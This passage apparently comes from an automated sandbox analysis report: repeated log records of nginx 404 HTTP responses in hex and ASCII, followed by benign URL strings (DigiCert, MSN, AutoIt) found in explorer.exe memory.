handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:17:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:18:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:19:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:19:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:19:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:19:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:19:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:19:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:19:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:19:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:19:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:19:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 01 Oct 2024 13:20:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: explorer.exe, 00000001.00000000.1719274631.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1720881139.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000001.00000000.1719274631.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1720881139.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000001.00000000.1719274631.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1720881139.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000001.00000000.1719274631.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1720881139.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000001.00000000.1719274631.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000001.00000000.1720036058.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1720434520.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1721753963.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000001.00000000.1723311543.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000001.00000000.1723311543.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1719274631.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1719274631.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1723311543.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1720881139.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1720881139.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1717954667.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1718481604.0000000003700000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1720881139.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1720881139.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1720881139.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1719274631.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
